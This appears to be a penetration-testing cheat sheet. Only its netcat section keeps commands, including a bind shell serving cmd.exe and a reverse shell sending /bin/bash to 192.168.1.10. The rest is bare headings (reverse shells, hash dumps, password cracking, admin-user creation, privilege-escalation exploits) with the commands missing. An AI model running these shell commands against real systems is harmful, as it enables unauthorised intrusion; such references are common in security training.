Connect to port
nc -nv 192.168.1.10 110
Bind port and connect to:
nc -nlvp 4444
nc -nv 192.168.1.10 4444
Copy files
nc -nlvp 4444 > dest-file
nc -nv 192.168.1.10 4444 < local-file
Bind shell and remote execution
nc -nlvp 4444 -e cmd.exe
nc -nv 192.168.1.10 4444
Reverse shell
nc -nlvp 4444
nc -nv 192.168.1.10 4444 -e /bin/bash
Scan ports
nc -nvv -w 1 -z 192.168.1.10 3388-3390
Bind shell SSL with allow IP address
Reverse shell SSL
Load a .pcap file
Filter by source host
Filter by destination host
Filter by port
Print packet data in HEX and ASCI
Packets with ACK or PSH flags set
Print HEX data on an 1500 MTU card
Search all sources for email
Search employees on linkedin
Search emails and query hosts in shodan
Find name servers
Find mail servers
Find address and mail servers
Reverse lookup
Transfer DNS zone
Try all NS DNS zone transfer
Try DNS zone transfer
Enumerate host in a domain
TCP syn/ack scan
Scan all ports
Identify host in the network (ICMP)
Scan port 80 on all hosts
OS, port, version, traceroute and script scan of top 20 port in a range
OS scan
Service Version scan
Script discover nsb and host version
Script DNS zone transfer
Scan for smb services (139-netbios,445-microsoft-ds)
Enum http path
Discover SMB hosts in a network, get IP, NetBIOS name and users
Discover SMB host info
Search specific vulnerability
Enumerate shares
Map smb shares
Mount share
Connect smtp
Scan strings [community, public, manager, etc]
Enumerate MIB tree
Enumerate some SMTP OID
PHP reverse shell
Windows bind port (No firewall enabled)
Microsoft ASP .net reverse shell
Create windows executable
GCC / compilation
Regular compilation
Cross compile x86 in x86_64 host
Analise web with default settings
Scan web service directories and files
Scan non recursively, non show attempts and bigger words list
Non interactive FTP download from windows
Non interactive hash dump
Create a python webserver
NoSQl user/pass enum
Search exploit
See exploit code
Copy exploit current location
John the ripper
Merge passwd and shadow files
Crack passwords
Crack SSH key passphrase
Mutate cewl dictionary
Crack linux passwords
LFI example
Python interactive bash shell
Scape restricted shell: -rbash: /usr/bin/python: restricted: cannot specify '/' in command names
Python reverse shell
Non interactive queries
Crawl robots txt as a search engine agent
Generate passwds from web words
Brute force logging
Silent fuzzing
Windows commands
Create admin user with RDP
Quick local enumeration
Download file with powershell
Non interactive download
Download file with certutil
Windows exploit suggester
Copy systeminfo to local host
Well know exploits
Ubuntu 11 - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
Common vulnerabilities
Exploit and reverse shell
Windows XP SP1 priv escalation